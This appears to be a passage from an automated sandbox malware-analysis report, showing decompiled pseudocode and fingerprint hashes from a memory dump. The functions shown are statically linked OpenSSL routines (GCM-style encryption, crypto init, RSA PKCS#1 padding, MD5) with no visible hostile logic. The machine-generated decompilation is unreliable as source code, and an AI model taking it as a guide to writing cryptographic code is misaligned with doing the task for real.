                                                              				_a16 = _t74;
                                                              				_a4 = _t104;
                                                              				if((_t98 & 0x00000040) == 0) {
                                                              					 *_t74(_t140,  &(_t140[4]), _t104);
                                                              					_t143 = _t143 + 0xc;
                                                              				}
                                                              				_t76 = _t98 & 7;
                                                              				_t100 = 0xf - _t76;
                                                              				 *_t140 = _t76;
                                                              				_t77 = 0xf;
                                                              				_t105 = 0;
                                                              				_a20 = 0xf;
                                                              				if(0xf < 0xf) {
                                                              					do {
                                                              						_t122 =  *(_t140 + _t77) & 0x000000ff;
                                                              						_t120 = _t105 |  *(_t140 + _t77) & 0x000000ff;
                                                              						 *(_t140 + _t77) = 0;
                                                              						_t77 = _t77 + 1;
                                                              						_t105 = _t120 << 8;
                                                              					} while (_t77 < 0xf);
                                                              				}
                                                              				_t78 = _t140[3] & 0x000000ff;
                                                              				_t142 = _a64;
                                                              				_t140[3] = 1;
                                                              				if((_t105 | _t140[3] & 0x000000ff) == _t142) {
                                                              					_push(_t133);
                                                              					_t135 = _t142 >> 4;
                                                              					if(_t135 == 0) {
                                                              						L9:
                                                              						if(_t142 != 0) {
                                                              							_a16(_t140,  &_a28, _a4);
                                                              							_t146 = _t143 + 0xc;
                                                              							_t89 = 0;
                                                              							if(_t142 > 0) {
                                                              								_t112 =  &_a28;
                                                              								_t138 = _a12 - _t112;
                                                              								_t102 = _a8 - _t112;
                                                              								do {
                                                              									_t129 = _t146 + _t89 + 0x2c;
                                                              									_t114 =  *(_t138 + _t129) ^  *_t129;
                                                              									_t89 = _t89 + 1;
                                                              									 *(_t102 + _t129) = _t114;
                                                              									 *(_t140 + _t89 + 0xf) =  *(_t140 + _t89 + 0xf) ^ _t114;
                                                              								} while (_t89 < _t142);
                                                              								_t100 = _a20;
                                                              							}
                                                              							_t90 =  &(_t140[4]);
                                                              							_a16(_t90, _t90, _a4);
                                                              							_t143 = _t146 + 0xc;
                                                              						}
                                                              					} else {
                                                              						_a24(_a12, _a8, _t135, _a4, _t140,  &(_t140[4]));
                                                              						_t131 = _t135 << 4;
                                                              						_a12 = _a12 + _t131;
                                                              						_a8 = _a8 + _t131;
                                                              						_t143 = _t143 + 0x18;
                                                              						_t142 = _t142 - _t131;
                                                              						if(_t142 != 0) {
                                                              							E00B9CFA0(_t140, _t131 >> 4);
                                                              							goto L9;
                                                              						}
                                                              					}
                                                              					_pop(_t136);
                                                              					if(_t100 < 0x10) {
                                                              						E00C6BB40(_t136, _t140 + _t100, 0, 0x10 - _t100);
                                                              						_t143 = _t143 + 0xc;
                                                              					}
                                                              					_a16( &_a28, _a4);
                                                              					_t140[5] = _t140[5] ^ _a32;
                                                              					_t140[4] = _t140[4] ^ _a28;
                                                              					_t140[6] = _t140[6] ^ _a36;
                                                              					_t140[7] = _t140[7] ^ _a40;
                                                              					 *_t140 = _a3;
                                                              					return E00C69C26(0, _t100, _a44 ^ _t143 + 0x0000000c, _a40, _t136, _t140, _t140);
                                                              				} else {
                                                              					return E00C69C26(_t78 | 0xffffffff, _t100, _a44 ^ _t143, _t122, _t133, _t140);
                                                              				}
                                                              			}

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID: _memset
                                                              • String ID:
                                                              • API String ID: 2102423945-0
                                                              • Opcode ID: 360737a0d0923fc1474a31caeeae8da57f0600eecab5f8cc646aa173639f0f77
                                                              • Instruction ID: 36b324f7e1729bb6aec208b1bee25127b708e59a321adeb0a11586cc80148804
                                                              • Opcode Fuzzy Hash: 360737a0d0923fc1474a31caeeae8da57f0600eecab5f8cc646aa173639f0f77
                                                              • Instruction Fuzzy Hash: 76516B716087419FC729CF69C89096BFBE5EFC9314F448A6EF4DA87241D630E909CB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 86%
                                                              			E00BB4FA0(void* __edi, signed int _a4, intOrPtr* _a12) {
                                                              				signed int _t32;
                                                              				signed int _t82;
                                                              				signed int _t86;
                                                              				signed int _t88;
                                                              				signed int _t90;
                                                              				signed int _t92;
                                                              				signed int _t94;
                                                              				signed int _t96;
                                                              				intOrPtr _t98;
                                                              				intOrPtr* _t100;
                                                              				signed int _t101;
                                                              				signed int _t103;
                                                              				signed int _t105;
                                                              				signed int _t107;
                                                              				signed int _t109;
                                                              				signed int _t111;
                                                              				signed int _t113;
                                                              				signed int _t115;
                                                              				intOrPtr _t134;
                                                              				signed int _t140;
                                                              				void* _t145;
                                                              				void* _t146;
                                                              				void* _t148;
                                                              
                                                              				_t135 = __edi;
                                                              				if( *0xcc904c == 0) {
                                                              					_t32 = E00BA4700(0xcc9058, 0xbb4f50);
                                                              					_t146 = _t145 + 8;
                                                              					asm("sbb eax, eax");
                                                              					if(( *0xcc9060 &  ~_t32) == 0) {
                                                              						goto L3;
                                                              					} else {
                                                              						_t140 = _a4;
                                                              						if((_t140 & 0x00000001) == 0) {
                                                              							L7:
                                                              							if((_t140 & 0x00000002) == 0) {
                                                              								L9:
                                                              								if((_t140 & 0x00000010) == 0) {
                                                              									L11:
                                                              									if((_t140 & 0x00000004) == 0) {
                                                              										L13:
                                                              										if((_t140 & 0x00000020) == 0) {
                                                              											L15:
                                                              											if((_t140 & 0x00000008) == 0) {
                                                              												L17:
                                                              												if((_t140 & 0x00000080) == 0) {
                                                              													L19:
                                                              													if((_t140 & 0x00000040) == 0) {
                                                              														L24:
                                                              														if((_t140 & 0x00000100) == 0) {
                                                              															L26:
                                                              															if((_t140 & 0x00000800) == 0) {
                                                              																L28:
                                                              																if((_t140 & 0x00000200) == 0) {
                                                              																	L30:
                                                              																	if((_t140 & 0x00000400) == 0) {
                                                              																		L32:
                                                              																		if((_t140 & 0x00004000) == 0) {
                                                              																			L34:
                                                              																			if((_t140 & 0x00002000) == 0) {
                                                              																				L36:
                                                              																				if((_t140 & 0x0000fe00) != 0) {
                                                              																					E00BD19D0(_t135);
                                                              																				}
                                                              																				if((_t140 & 0x00010000) == 0) {
                                                              																					L41:
                                                              																					return 1;
                                                              																				} else {
                                                              																					_t82 = E00BA4700(0xcc90cc, 0xbb4f40);
                                                              																					asm("sbb eax, eax");
                                                              																					if(( *0xcc90d4 &  ~_t82) != 0) {
                                                              																						goto L41;
                                                              																					} else {
                                                              																						goto L40;
                                                              																					}
                                                              																				}
                                                              																			} else {
                                                              																				_t86 = E00BA4700(0xcc90c4, 0xbb4f30);
                                                              																				_t146 = _t146 + 8;
                                                              																				asm("sbb eax, eax");
                                                              																				if(( *0xcc90c8 &  ~_t86) == 0) {
                                                              																					goto L40;
                                                              																				} else {
                                                              																					goto L36;
                                                              																				}
                                                              																			}
                                                              																		} else {
                                                              																			_t88 = E00BA4700(0xcc90bc, 0xbb4f20);
                                                              																			_t146 = _t146 + 8;
                                                              																			asm("sbb eax, eax");
                                                              																			if(( *0xcc90c0 &  ~_t88) == 0) {
                                                              																				goto L40;
                                                              																			} else {
                                                              																				goto L34;
                                                              																			}
                                                              																		}
                                                              																	} else {
                                                              																		_t90 = E00BA4700(0xcc90b4, 0xbb4f10);
                                                              																		_t146 = _t146 + 8;
                                                              																		asm("sbb eax, eax");
                                                              																		if(( *0xcc90b8 &  ~_t90) == 0) {
                                                              																			goto L40;
                                                              																		} else {
                                                              																			goto L32;
                                                              																		}
                                                              																	}
                                                              																} else {
                                                              																	_t92 = E00BA4700(0xcc90ac, 0xbb4f00);
                                                              																	_t146 = _t146 + 8;
                                                              																	asm("sbb eax, eax");
                                                              																	if(( *0xcc90b0 &  ~_t92) == 0) {
                                                              																		goto L40;
                                                              																	} else {
                                                              																		goto L30;
                                                              																	}
                                                              																}
                                                              															} else {
                                                              																_t94 = E00BA4700(0xcc90a4, 0xbb4ef0);
                                                              																_t146 = _t146 + 8;
                                                              																asm("sbb eax, eax");
                                                              																if(( *0xcc90a8 &  ~_t94) == 0) {
                                                              																	goto L40;
                                                              																} else {
                                                              																	goto L28;
                                                              																}
                                                              															}
                                                              														} else {
                                                              															_t96 = E00BA4700(0xcc9098, 0xbb4ed0);
                                                              															_t146 = _t146 + 8;
                                                              															asm("sbb eax, eax");
                                                              															if(( *0xcc90a0 &  ~_t96) == 0) {
                                                              																goto L40;
                                                              															} else {
                                                              																goto L26;
                                                              															}
                                                              														}
                                                              													} else {
                                                              														_t98 =  *0xcc9054; // 0x29258b0
                                                              														E00BA4690(_t98);
                                                              														_t100 = _a12;
                                                              														_t148 = _t146 + 4;
                                                              														if(_t100 != 0) {
                                                              															 *0xcc9048 =  *_t100;
                                                              														} else {
                                                              															 *0xcc9048 = _t100;
                                                              														}
                                                              														_t101 = E00BA4700(0xcc9088, 0xbb4e90);
                                                              														_t134 =  *0xcc9054; // 0x29258b0
                                                              														asm("sbb edi, edi");
                                                              														E00BA46B0(_t134);
                                                              														_t146 = _t148 + 0xc;
                                                              														_t135 = _t135;
                                                              														if(( ~_t101 &  *0xcc9090) == 0) {
                                                              															goto L40;
                                                              														} else {
                                                              															goto L24;
                                                              														}
                                                              													}
                                                              												} else {
                                                              													_t103 = E00BA4700(0xcc9088, 0xbb4eb0);
                                                              													_t146 = _t146 + 8;
                                                              													asm("sbb eax, eax");
                                                              													if(( *0xcc9094 &  ~_t103) == 0) {
                                                              														goto L40;
                                                              													} else {
                                                              														goto L19;
                                                              													}
                                                              												}
                                                              											} else {
                                                              												_t105 = E00BA4700(0xcc907c, 0xbb4e70);
                                                              												_t146 = _t146 + 8;
                                                              												asm("sbb eax, eax");
                                                              												if(( *0xcc9080 &  ~_t105) == 0) {
                                                              													goto L40;
                                                              												} else {
                                                              													goto L17;
                                                              												}
                                                              											}
                                                              										} else {
                                                              											_t107 = E00BA4700(0xcc907c, 0xbb4e80);
                                                              											_t146 = _t146 + 8;
                                                              											asm("sbb eax, eax");
                                                              											if(( *0xcc9084 &  ~_t107) == 0) {
                                                              												goto L40;
                                                              											} else {
                                                              												goto L15;
                                                              											}
                                                              										}
                                                              									} else {
                                                              										_t109 = E00BA4700(0xcc9074, 0xbb4e60);
                                                              										_t146 = _t146 + 8;
                                                              										asm("sbb eax, eax");
                                                              										if(( *0xcc9078 &  ~_t109) == 0) {
                                                              											goto L40;
                                                              										} else {
                                                              											goto L13;
                                                              										}
                                                              									}
                                                              								} else {
                                                              									_t111 = E00BA4700(0xcc9074, 0xbb4e80);
                                                              									_t146 = _t146 + 8;
                                                              									asm("sbb eax, eax");
                                                              									if(( *0xcc9084 &  ~_t111) == 0) {
                                                              										goto L40;
                                                              									} else {
                                                              										goto L11;
                                                              									}
                                                              								}
                                                              							} else {
                                                              								_t113 = E00BA4700(0xcc9064, 0xbb4e40);
                                                              								_t146 = _t146 + 8;
                                                              								asm("sbb eax, eax");
                                                              								if(( *0xcc9070 &  ~_t113) == 0) {
                                                              									goto L40;
                                                              								} else {
                                                              									goto L9;
                                                              								}
                                                              							}
                                                              						} else {
                                                              							_t115 = E00BA4700(0xcc9064, 0xbb4e30);
                                                              							_t146 = _t146 + 8;
                                                              							asm("sbb eax, eax");
                                                              							if(( *0xcc906c &  ~_t115) == 0) {
                                                              								L40:
                                                              								return 0;
                                                              							} else {
                                                              								goto L7;
                                                              							}
                                                              						}
                                                              					}
                                                              				} else {
                                                              					if( *0xcc90d8 == 0) {
                                                              						 *0xcc90d8 = 1;
                                                              						E00B98310(__edi, 0xf, 0x74, 0x46, "crypto\\init.c", 0x1d8);
                                                              					}
                                                              					L3:
                                                              					return 0;
                                                              				}
                                                              			}
                                                              0x00bb507b
                                                              0x00bb5032
                                                              0x00bb503c
                                                              0x00bb5041
                                                              0x00bb5046
                                                              0x00bb504e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bb504e
                                                              0x00bb5005
                                                              0x00bb500f
                                                              0x00bb5014
                                                              0x00bb5019
                                                              0x00bb5021
                                                              0x00bb52e9
                                                              0x00bb52ec
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00bb5021
                                                              0x00bb5003
                                                              0x00bb4fa9
                                                              0x00bb4fb0
                                                              0x00bb4fc2
                                                              0x00bb4fcc
                                                              0x00bb4fd1
                                                              0x00bb4fd4
                                                              0x00bb4fd6
                                                              0x00bb4fd6

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID: CriticalEnterSection
                                                              • String ID: crypto\init.c
                                                              • API String ID: 1904992153-2222486511
                                                              • Opcode ID: 2bfd7f14384b3fc5c2e4e2c5e0d827b80141db12e93dc78d73cc68eae2b560bf
                                                              • Instruction ID: ae4ed0bd991460d681a11249171c010cf476edf42c505bbf52050329c608efd4
                                                              • Opcode Fuzzy Hash: 2bfd7f14384b3fc5c2e4e2c5e0d827b80141db12e93dc78d73cc68eae2b560bf
                                                              • Instruction Fuzzy Hash: 4071D775BA2A5267CF6456B8FC0BFFA31C0E799B11F0805BAF446D21D2EFE0D8048556
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 94%
                                                              			E00BB9650(void* __esi, signed int _a4, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                              				signed int _v0;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				signed int _t27;
                                                              				signed int _t39;
                                                              				intOrPtr _t51;
                                                              				signed int _t56;
                                                              				signed int _t68;
                                                              				signed int _t73;
                                                              				signed char* _t82;
                                                              				intOrPtr _t84;
                                                              				signed int _t86;
                                                              				signed int _t94;
                                                              				signed int _t95;
                                                              				signed int _t99;
                                                              				void* _t100;
                                                              				void* _t102;
                                                              				void* _t104;
                                                              
                                                              				_t27 = E00C6BB10(8);
                                                              				_t82 = 0;
                                                              				_t95 = _t94 | 0xffffffff;
                                                              				_a4 = 0;
                                                              				if(_a16 < 0) {
                                                              					L15:
                                                              					return _t27 | 0xffffffff;
                                                              				} else {
                                                              					_t51 = _a24;
                                                              					if(_t51 < 0) {
                                                              						goto L15;
                                                              					} else {
                                                              						_t84 = _a28;
                                                              						if(_t51 > _t84 || _t84 < 0xb) {
                                                              							L12:
                                                              							_push(0xf0);
                                                              							_push("crypto\\rsa\\rsa_pk1.c");
                                                              							E00BA3490(_t82);
                                                              							_t102 = _t100 + 0xc;
                                                              							if(_t95 == 0xffffffff) {
                                                              								E00B98310(_t82, 4, 0x71, 0x9f, "crypto\\rsa\\rsa_pk1.c", 0xf3);
                                                              								_t102 = _t102 + 0x14;
                                                              							}
                                                              							return _t95;
                                                              						} else {
                                                              							_t82 = E00BA3430(_t51, _t84, "crypto\\rsa\\rsa_pk1.c", 0xb2);
                                                              							_t104 = _t100 + 0xc;
                                                              							if(_t82 != 0) {
                                                              								E00C6B7A0(_t51, _t82, _t84, _t82 - _t51 + _t84, _a20, _t51);
                                                              								_t56 =  ~((_t82[1] & 0x000000ff ^ 0x00000002) - 0x00000001 >> 0x0000001f &  !(_t82[1] & 0x000000ff ^ 0x00000002) >> 0x0000001f) &  ~(( *_t82 & 0x000000ff) - 0x00000001 >> 0x0000001f &  !( *_t82 & 0x000000ff) >> 0x0000001f);
                                                              								_t73 = 2;
                                                              								_t100 = _t104 + 0xc;
                                                              								_v0 = 0;
                                                              								if(_t84 > 2) {
                                                              									do {
                                                              										_t68 =  ~((_t82[_t73] & 0x000000ff) - 0x00000001 >> 0x0000001f &  !(_t82[_t73] & 0x000000ff) >> 0x0000001f);
                                                              										_v0 = _v0 | _t68;
                                                              										_t99 =  !( !_v0 & _t68) & _a4 |  !_v0 & _t68 & _t73;
                                                              										_t73 = _t73 + 1;
                                                              										_a4 = _t99;
                                                              									} while (_t73 < _t84);
                                                              								}
                                                              								_t39 = _a4;
                                                              								_t63 = _t39 + 1;
                                                              								_t86 = _t84 - _t39 + 1;
                                                              								_t95 = _t86;
                                                              								_t92 = (((_t39 - 0x0000000a | _t39) ^ _t39) >> 0x1f) - 1;
                                                              								if((_t56 & (((_a16 - _t95 ^ _t95 | _t86 ^ _a16) ^ _a16) >> 0x0000001f) - 0x00000001 & (((_t39 - 0x0000000a | _t39) ^ _t39) >> 0x0000001f) - 0x00000001) != 0) {
                                                              									E00C6B7A0(_t56, _t82, _t92, _a12, _t63 + _t82, _t95);
                                                              									_t100 = _t100 + 0xc;
                                                              								} else {
                                                              									_t95 = _t95 | 0xffffffff;
                                                              								}
                                                              								goto L12;
                                                              							} else {
                                                              								return E00B98310(_t82, 4, 0x71, 0x41, "crypto\\rsa\\rsa_pk1.c", 0xb4) | _t95;
                                                              							}
                                                              						}
                                                              					}
                                                              				}
                                                              			}






















                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              Similarity
                                                              • API ID: _memset
                                                              • String ID: crypto\rsa\rsa_pk1.c
                                                              • API String ID: 2102423945-3200250649
                                                              • Opcode ID: ff6f062792b9857f121d321d0493d8e8d432ed12b300c11c597bf4ae40bc62d3
                                                              • Instruction ID: 110b8beda354fdb78abee67683d5aa3cd8f74111b4540eccddbf25b368fcaca8
                                                              • Opcode Fuzzy Hash: ff6f062792b9857f121d321d0493d8e8d432ed12b300c11c597bf4ae40bc62d3
                                                              • Instruction Fuzzy Hash: DF419D32A543051BCB10DE69DC86A7BF3D1EBC0724F040768FA68D72C2DFB599099291
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 60%
                                                              			E00BCA800() {
                                                              				intOrPtr _t202;
                                                              				signed int _t205;
                                                              				signed int _t208;
                                                              				signed int _t211;
                                                              				signed int _t214;
                                                              				signed int _t217;
                                                              				signed int _t220;
                                                              				signed int _t223;
                                                              				signed int _t226;
                                                              				signed int _t229;
                                                              				signed int _t232;
                                                              				signed int _t235;
                                                              				signed int _t238;
                                                              				signed int _t241;
                                                              				signed int _t244;
                                                              				signed int _t247;
                                                              				signed int _t250;
                                                              				void* _t251;
                                                              				signed int _t252;
                                                              				signed int _t255;
                                                              				signed int _t258;
                                                              				signed int _t261;
                                                              				signed int _t264;
                                                              				signed int _t267;
                                                              				signed int _t270;
                                                              				signed int _t273;
                                                              				signed int _t276;
                                                              				signed int _t279;
                                                              				signed int _t282;
                                                              				signed int _t285;
                                                              				signed int _t288;
                                                              				signed int _t291;
                                                              				signed int _t294;
                                                              				signed int _t297;
                                                              				signed int _t305;
                                                              				signed int _t308;
                                                              				signed int _t311;
                                                              				signed int _t314;
                                                              				signed int _t317;
                                                              				signed int _t320;
                                                              				signed int _t323;
                                                              				signed int _t326;
                                                              				signed int _t329;
                                                              				signed int _t332;
                                                              				signed int _t335;
                                                              				signed int _t338;
                                                              				signed int _t341;
                                                              				signed int _t344;
                                                              				signed int _t347;
                                                              				signed int _t350;
                                                              				signed int _t353;
                                                              				signed int _t354;
                                                              				signed int _t357;
                                                              				signed int _t360;
                                                              				signed int _t363;
                                                              				signed int _t366;
                                                              				signed int _t369;
                                                              				signed int _t372;
                                                              				signed int _t375;
                                                              				signed int _t378;
                                                              				signed int _t381;
                                                              				signed int _t384;
                                                              				signed int _t387;
                                                              				signed int _t390;
                                                              				signed int _t393;
                                                              				signed int _t396;
                                                              				signed int _t399;
                                                              				signed int _t402;
                                                              				intOrPtr* _t403;
                                                              				intOrPtr* _t649;
                                                              				intOrPtr* _t714;
                                                              				intOrPtr* _t715;
                                                              
                                                              				_t403 =  *((intOrPtr*)(_t715 + 0xc));
                                                              				_t649 =  *((intOrPtr*)(_t715 + 0x10));
                                                              				_t202 =  *_t403;
                                                              				_push(( *(_t715 + 0x14) << 6) + _t649 - 0x40);
                                                              				_t252 =  *(_t403 + 4);
                                                              				_t305 =  *(_t403 + 8);
                                                              				_t354 =  *(_t403 + 0xc);
                                                              				do {
                                                              					_t9 = _t649 + 4; // 0xe3e85651
                                                              					asm("rol eax, 0x7");
                                                              					_t205 = _t202 +  *_t649 - 0x28955b88 + ((_t305 ^ _t354) & _t252 ^ _t354) + _t252;
                                                              					_t12 = _t649 + 8; // 0x8d0001c6
                                                              					asm("rol edx, 0xc");
                                                              					_t357 = _t354 +  *_t9 - 0x173848aa + ((_t252 ^ _t305) & _t205 ^ _t305) + _t205;
                                                              					_t15 = _t649 + 0xc; // 0x6a182454
                                                              					asm("rol ecx, 0x11");
                                                              					_t308 = _t305 +  *_t12 + 0x242070db + ((_t205 ^ _t252) & _t357 ^ _t252) + _t357;
                                                              					_t18 = _t649 + 0x10; // 0xc7e8525c
                                                              					asm("rol ebx, 0x16");
                                                              					_t255 = _t252 +  *_t15 - 0x3e423112 + ((_t357 ^ _t205) & _t308 ^ _t205) + _t308;
                                                              					_t21 = _t649 + 0x14; // 0x830000bf
                                                              					asm("rol eax, 0x7");
                                                              					_t208 = _t205 +  *_t18 - 0xa83f051 + ((_t308 ^ _t357) & _t255 ^ _t357) + _t255;
                                                              					_t24 = _t649 + 0x18; // 0xc68b1cc4
                                                              					asm("rol edx, 0xc");
                                                              					_t360 = _t357 +  *_t21 + 0x4787c62a + ((_t255 ^ _t308) & _t208 ^ _t308) + _t208;
                                                              					_t27 = _t649 + 0x1c; // 0x5cc4835e
                                                              					asm("rol ecx, 0x11");
                                                              					_t311 = _t308 +  *_t24 - 0x57cfb9ed + ((_t208 ^ _t255) & _t360 ^ _t255) + _t360;
                                                              					_t30 = _t649 + 0x20; // 0xccccccc3
                                                              					asm("rol ebx, 0x16");
                                                              					_t258 = _t255 +  *_t27 - 0x2b96aff + ((_t360 ^ _t208) & _t311 ^ _t208) + _t311;
                                                              					_t33 = _t649 + 0x24; // 0xcccccccc
                                                              					asm("rol eax, 0x7");
                                                              					_t211 = _t208 +  *_t30 + 0x698098d8 + ((_t311 ^ _t360) & _t258 ^ _t360) + _t258;
                                                              					_t36 = _t649 + 0x28; // 0xcccccccc
                                                              					asm("rol edx, 0xc");
                                                              					_t363 = _t360 +  *_t33 - 0x74bb0851 + ((_t258 ^ _t311) & _t211 ^ _t311) + _t211;
                                                              					_t39 = _t649 + 0x2c; // 0x448bcccc
                                                              					asm("rol ecx, 0x11");
                                                              					_t314 = _t311 +  *_t36 - 0xa44f + ((_t211 ^ _t258) & _t363 ^ _t258) + _t363;
                                                              					_t42 = _t649 + 0x30; // 0x8b0424
                                                              					asm("rol ebx, 0x16");
                                                              					_t261 = _t258 +  *_t39 - 0x76a32842 + ((_t363 ^ _t211) & _t314 ^ _t211) + _t314;
                                                              					_t45 = _t649 + 0x34; // 0xe9c1c88b
                                                              					asm("rol eax, 0x7");
                                                              					_t214 = _t211 +  *_t42 + 0x6b901122 + ((_t314 ^ _t363) & _t261 ^ _t363) + _t261;
                                                              					_t48 = _t649 + 0x38; // 0xc1c8330c
                                                              					asm("rol edx, 0xc");
                                                              					_t366 = _t363 +  *_t45 - 0x2678e6d + ((_t261 ^ _t314) & _t214 ^ _t314) + _t214;
                                                              					_t51 = _t649 + 0x3c; // 0xe1810ce9
                                                              					asm("rol ecx, 0x11");
                                                              					_t317 = _t314 +  *_t48 - 0x5986bc72 + ((_t214 ^ _t261) & _t366 ^ _t261) + _t366;
                                                              					_t54 = _t649 + 4; // 0xe3e85651
                                                              					asm("rol ebx, 0x16");
                                                              					_t264 = _t261 +  *_t51 + 0x49b40821 + ((_t366 ^ _t214) & _t317 ^ _t214) + _t317;
                                                              					_t57 = _t649 + 0x18; // 0xc68b1cc4
                                                              					asm("rol eax, 0x5");
                                                              					_t217 = _t214 +  *_t54 - 0x9e1da9e + ((_t317 ^ _t264) & _t366 ^ _t317) + _t264;
                                                              					_t60 = _t649 + 0x2c; // 0x448bcccc
                                                              					asm("rol edx, 0x9");
                                                              					_t369 = _t366 +  *_t57 - 0x3fbf4cc0 + ((_t264 ^ _t217) & _t317 ^ _t264) + _t217;
                                                              					asm("rol ecx, 0xe");
                                                              					_t320 = _t317 +  *_t60 + 0x265e5a51 + ((_t217 ^ _t369) & _t264 ^ _t217) + _t369;
                                                              					_t65 = _t649 + 0x14; // 0x830000bf
                                                              					asm("rol ebx, 0x14");
                                                              					_t267 = _t264 +  *_t649 - 0x16493856 + ((_t369 ^ _t320) & _t217 ^ _t369) + _t320;
                                                              					_t68 = _t649 + 0x28; // 0xcccccccc
                                                              					asm("rol eax, 0x5");
                                                              					_t220 = _t217 +  *_t65 - 0x29d0efa3 + ((_t320 ^ _t267) & _t369 ^ _t320) + _t267;
                                                              					_t71 = _t649 + 0x3c; // 0xe1810ce9
                                                              					asm("rol edx, 0x9");
                                                              					_t372 = _t369 +  *_t68 + 0x2441453 + ((_t267 ^ _t220) & _t320 ^ _t267) + _t220;
                                                              					_t74 = _t649 + 0x10; // 0xc7e8525c
                                                              					asm("rol ecx, 0xe");
                                                              					_t323 = _t320 +  *_t71 - 0x275e197f + ((_t220 ^ _t372) & _t267 ^ _t220) + _t372;
                                                              					_t77 = _t649 + 0x24; // 0xcccccccc
                                                              					asm("rol ebx, 0x14");
                                                              					_t270 = _t267 +  *_t74 - 0x182c0438 + ((_t372 ^ _t323) & _t220 ^ _t372) + _t323;
                                                              					_t80 = _t649 + 0x38; // 0xc1c8330c
                                                              					asm("rol eax, 0x5");
                                                              					_t223 = _t220 +  *_t77 + 0x21e1cde6 + ((_t323 ^ _t270) & _t372 ^ _t323) + _t270;
                                                              					_t83 = _t649 + 0xc; // 0x6a182454
                                                              					asm("rol edx, 0x9");
                                                              					_t375 = _t372 +  *_t80 - 0x3cc8f82a + ((_t270 ^ _t223) & _t323 ^ _t270) + _t223;
                                                              					_t86 = _t649 + 0x20; // 0xccccccc3
                                                              					asm("rol ecx, 0xe");
                                                              					_t326 = _t323 +  *_t83 - 0xb2af279 + ((_t223 ^ _t375) & _t270 ^ _t223) + _t375;
                                                              					_t89 = _t649 + 0x34; // 0xe9c1c88b
                                                              					asm("rol ebx, 0x14");
                                                              					_t273 = _t270 +  *_t86 + 0x455a14ed + ((_t375 ^ _t326) & _t223 ^ _t375) + _t326;
                                                              					_t92 = _t649 + 8; // 0x8d0001c6
                                                              					asm("rol eax, 0x5");
                                                              					_t226 = _t223 +  *_t89 - 0x561c16fb + ((_t326 ^ _t273) & _t375 ^ _t326) + _t273;
                                                              					_t95 = _t649 + 0x1c; // 0x5cc4835e
                                                              					asm("rol edx, 0x9");
                                                              					_t378 = _t375 +  *_t92 - 0x3105c08 + ((_t273 ^ _t226) & _t326 ^ _t273) + _t226;
                                                              					_t98 = _t649 + 0x30; // 0x8b0424
                                                              					asm("rol ecx, 0xe");
                                                              					_t329 = _t326 +  *_t95 + 0x676f02d9 + ((_t226 ^ _t378) & _t273 ^ _t226) + _t378;
                                                              					_t101 = _t649 + 0x14; // 0x830000bf
                                                              					asm("rol ebx, 0x14");
                                                              					_t276 = _t273 +  *_t98 - 0x72d5b376 + ((_t378 ^ _t329) & _t226 ^ _t378) + _t329;
                                                              					_t104 = _t649 + 0x20; // 0xccccccc3
                                                              					asm("rol eax, 0x4");
                                                              					_t229 = _t226 +  *_t101 - 0x5c6be + (_t329 ^ _t378 ^ _t276) + _t276;
                                                              					_t107 = _t649 + 0x2c; // 0x448bcccc
                                                              					asm("rol edx, 0xb");
                                                              					_t381 = _t378 +  *_t104 - 0x788e097f + (_t276 ^ _t329 ^ _t229) + _t229;
                                                              					_t110 = _t649 + 0x38; // 0xc1c8330c
                                                              					asm("rol ecx, 0x10");
                                                              					_t332 = _t329 +  *_t107 + 0x6d9d6122 + (_t229 ^ _t276 ^ _t381) + _t381;
                                                              					_t113 = _t649 + 4; // 0xe3e85651
                                                              					asm("rol ebx, 0x17");
                                                              					_t279 = _t276 +  *_t110 - 0x21ac7f4 + (_t381 ^ _t229 ^ _t332) + _t332;
                                                              					_t116 = _t649 + 0x10; // 0xc7e8525c
                                                              					asm("rol eax, 0x4");
                                                              					_t232 = _t229 +  *_t113 - 0x5b4115bc + (_t332 ^ _t381 ^ _t279) + _t279;
                                                              					_t119 = _t649 + 0x1c; // 0x5cc4835e
                                                              					asm("rol edx, 0xb");
                                                              					_t384 = _t381 +  *_t116 + 0x4bdecfa9 + (_t279 ^ _t332 ^ _t232) + _t232;
                                                              					_t122 = _t649 + 0x28; // 0xcccccccc
                                                              					asm("rol ecx, 0x10");
                                                              					_t335 = _t332 +  *_t119 - 0x944b4a0 + (_t232 ^ _t279 ^ _t384) + _t384;
                                                              					_t125 = _t649 + 0x34; // 0xe9c1c88b
                                                              					asm("rol ebx, 0x17");
                                                              					_t282 = _t279 +  *_t122 - 0x41404390 + (_t384 ^ _t232 ^ _t335) + _t335;
                                                              					asm("rol eax, 0x4");
                                                              					_t235 = _t232 +  *_t125 + 0x289b7ec6 + (_t335 ^ _t384 ^ _t282) + _t282;
                                                              					_t130 = _t649 + 0xc; // 0x6a182454
                                                              					asm("rol edx, 0xb");
                                                              					_t387 = _t384 +  *_t649 - 0x155ed806 + (_t282 ^ _t335 ^ _t235) + _t235;
                                                              					_t133 = _t649 + 0x18; // 0xc68b1cc4
                                                              					asm("rol ecx, 0x10");
                                                              					_t338 = _t335 +  *_t130 - 0x2b10cf7b + (_t235 ^ _t282 ^ _t387) + _t387;
                                                              					_t136 = _t649 + 0x24; // 0xcccccccc
                                                              					asm("rol ebx, 0x17");
                                                              					_t285 = _t282 +  *_t133 + 0x4881d05 + (_t387 ^ _t235 ^ _t338) + _t338;
                                                              					_t139 = _t649 + 0x30; // 0x8b0424
                                                              					asm("rol eax, 0x4");
                                                              					_t238 = _t235 +  *_t136 - 0x262b2fc7 + (_t338 ^ _t387 ^ _t285) + _t285;
                                                              					_t142 = _t649 + 0x3c; // 0xe1810ce9
